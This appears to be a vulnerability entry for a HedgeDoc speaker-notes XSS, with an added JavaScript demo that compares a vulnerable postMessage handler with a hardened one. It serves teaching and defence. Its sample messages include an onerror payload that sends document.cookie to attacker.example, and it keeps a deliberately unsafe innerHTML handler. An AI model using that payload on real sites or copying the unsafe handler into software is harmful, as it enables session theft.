HedgeDoc is a platform to write and share markdown. In versions prior to 1.9.0, an unauthenticated attacker can inject arbitrary JavaScript into the speaker notes of the slide-mode feature, either by embedding an iframe that hosts the malicious code in the slides or by embedding the HedgeDoc instance in another page; in both cases the injected code runs in the context of the HedgeDoc origin. The problem is patched in version 1.9.0. There is no known workaround other than upgrading.
The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
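The description above explains the bug only as "embed an iframe in the slides" or "embed the instance in another page"; what both have in common is that a foreign browsing context gets to hand content to the speaker-notes view, and the view renders it as HTML without checking who sent it or what it contains. The following is an added illustration of that pattern and of the two checks that close it (sender-origin validation plus output sanitization). It is not HedgeDoc's code and not the fix from the linked pull requests; it assumes the notes travel over `window.postMessage`, invents the message shape `{ type: "notes", notes: "<html>" }`, and uses `https://hedgedoc.example` and `https://attacker.example` as hypothetical origins. The sample messages are constructed.

```javascript
// Added illustration, not HedgeDoc's code: a speaker-notes view that receives its
// content from another browsing context. The vulnerable handler renders whatever
// arrives as HTML; the hardened one checks the sender's origin and sanitizes.
// Assumptions: notes arrive via window.postMessage (the advisory only says the
// attacker embeds an iframe or embeds the instance in another page), the message
// shape { type: "notes", notes: "<html>" } is invented, and DECK_ORIGIN is a
// hypothetical deployment origin.

const DECK_ORIGIN = "https://hedgedoc.example";

// Tags the notes view is willing to keep. Everything else is dropped and all
// attributes are stripped, so on* event-handler attributes never survive.
const ALLOWED_TAGS = new Set(["p", "b", "i", "em", "strong", "ul", "ol", "li", "br", "code"]);

function escapeText(text) {
  return text.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Allowlist sanitizer for the demo. A real deployment should use a maintained
// library such as DOMPurify; this one is only as good as its tag regex.
function sanitizeNotes(html) {
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeText(html.slice(last, m.index));
    const name = m[1].toLowerCase();
    if (ALLOWED_TAGS.has(name)) {
      out += m[0].startsWith("</") ? `</${name}>` : `<${name}>`;
    }
    last = tagRe.lastIndex;
  }
  return out + escapeText(html.slice(last));
}

// Vulnerable pattern: any window that can reach this one (a hostile iframe inside
// the deck, or a page that embedded the deck) gets its payload rendered as HTML.
function vulnerableNotesHandler(event) {
  const data = event.data;
  if (!data || data.type !== "notes") return { rendered: false };
  return { rendered: true, html: String(data.notes) }; // caller does notesEl.innerHTML = html
}

// Hardened pattern: reject senders whose origin is not the deck's own, then
// sanitize anyway, because a same-origin sender is not automatically trusted
// (an attacker-controlled iframe could be hosted on the same origin).
function hardenedNotesHandler(event, deckOrigin = DECK_ORIGIN) {
  if (event.origin !== deckOrigin) return { rendered: false, reason: "origin mismatch" };
  const data = event.data;
  if (!data || data.type !== "notes" || typeof data.notes !== "string") {
    return { rendered: false, reason: "malformed message" };
  }
  return { rendered: true, html: sanitizeNotes(data.notes) };
}

// Constructed messages, shaped like what a "message" listener sees as MessageEvent.
const SAMPLE_MESSAGES = [
  // Legitimate notes from the deck itself.
  { origin: "https://hedgedoc.example",
    data: { type: "notes", notes: "<p>Remember to <b>pause</b> here.</p>" } },
  // From an attacker-hosted iframe or an embedding page: foreign origin.
  { origin: "https://attacker.example",
    data: { type: "notes",
            notes: "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">" } },
  // Same origin, but the payload itself carries active content.
  { origin: "https://hedgedoc.example",
    data: { type: "notes", notes: "<p onclick=\"alert(1)\">hi</p><script>alert(2)</script>" } },
];

// Runs every sample through both handlers so the difference is visible side by side.
function runDemo() {
  return SAMPLE_MESSAGES.map((ev) => ({
    origin: ev.origin,
    vulnerable: vulnerableNotesHandler(ev),
    hardened: hardenedNotesHandler(ev),
  }));
}

console.log(JSON.stringify(runDemo(), null, 2));
```

The origin check alone would stop the two embedding variants the advisory names, since a message from an attacker-hosted iframe or from an embedding page carries the attacker's origin, but it does nothing against a payload that arrives with the deck's own origin, which is why the hardened handler sanitizes as well. When reviewing a `message` listener, look for both: an `event.origin` comparison against a fixed allowlist (never a substring or prefix match) and no `innerHTML` assignment of the raw `event.data`.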
| Link | Tags |
|---|---|
| https://github.com/hedgedoc/hedgedoc/security/advisories/GHSA-j748-779h-9697 | Third Party Advisory, Patch |
| https://github.com/hedgedoc/hedgedoc/pull/1369 | Third Party Advisory, Patch |
| https://github.com/hedgedoc/hedgedoc/pull/1375 | Third Party Advisory, Patch |
| https://github.com/hedgedoc/hedgedoc/pull/1513 | Third Party Advisory, Patch |